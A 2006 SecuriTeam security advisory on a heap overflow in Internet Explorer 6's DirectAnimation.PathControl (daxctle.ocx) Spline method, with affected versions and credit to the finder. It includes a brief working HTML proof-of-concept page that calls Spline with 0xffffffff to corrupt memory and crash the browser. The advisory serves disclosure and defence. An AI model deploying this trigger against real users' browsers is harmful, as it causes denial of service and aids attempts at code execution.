Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam  Beyond Security  SecuriTeam Home  Ask the Team  Mailing Lists  Advertising Info  Blogs  Black Box Testing  Vulnerability Assessment  Vulnerability Scanner SecuriTeam in Your Inbox   E-mail this article to a friend New vulnerability? New tool? Tell us	Microsoft Internet Explorer daxctle.ocx Heap Overflow 29 Aug. 2006    Summary Microsoft Internet Explorer is vulnerable to an heap overflow attack when it handles a DirectAnimation.PathControl COM object.   Credit: The information has been provided by nop. The original article can be found at: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Windows 2000/XP/2003 Internet Explorer 6.0 SP1 When Internet Explorer handles an DirectAnimation.PathControl COM object (daxctle.ocx) \ Spline method, Setting the first parameter to 0xffffffff will triggers an invalid memory \ write, That way, an attacker may DoS and possibly could execute arbitrary code. Exploit: <!-- // Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability // tested on Windows 2000 SP4/XP SP2/2003 SP1 // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6} // Info: Microsoft DirectAnimation Path // ProgID: DirectAnimation.PathControl // InprocServer32: C:\WINNT\system32\daxctle.ocx --!> <html> <head> <title>test</title> </head> <body> <script> var target = new ActiveXObject("DirectAnimation.PathControl"); target.Spline(0xffffffff, 1); </script> </body> </html>  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Office Excel Malformed Records Stack Buffer Overflow (MS09-021) Microsoft Excel Record Parsing Array Indexing Vulnerability (MS09-021) Microsoft Excel String Parsing Integer Overflow Vulnerability (MS09-021) libpurple MSN Protocol SLP Message Heap Overflow Vulnerability CA ARCserve Backup Message Engine Denial of Service Vulnerabilities Microsoft Internet Explorer setCapture Memory Corruption Vulnerability (MS09-019) Microsoft Internet Explorer Security Zone Restrictions Bypass Microsoft Internet Explorer onreadystatechange Memory Corruption Vulnerability (MS09-019) Microsoft Internet Explorer Event Handler Memory Corruption Vulnerability (MS09-019) Microsoft Internet Explorer DHTML Handling Memory Corruption Vulnerability (MS09-019) Microsoft Internet Explorer Concurrent Ajax Request Memory Corruption (MS09-019) DX Studio Player Firefox Plug-in Command Injection SAP GUI Buffer Overflow Vulnerability Microsoft Office Word Document Parsing Buffer Overflow Vulnerability (MS09-027) Microsoft Active Directory Hexdecimal DN AttributeValue Invalid Free Vulnerability (MS09-018)  Featured Articles Adobe Shockwave Player Director File Parsing Pointer Overwrite Mozilla Firefox Java Applet Loading Vulnerability Microsoft Internet Explorer Security Zone Restrictions Bypass Adobe Acrobat and Reader Heap Overflow Vulnerability Adobe Reader U3D Stack Overflow Vulnerability Apple CUPS NULL Pointer Vulnerability SonicWALL Global Security Client Privilege Escalation Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2008 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®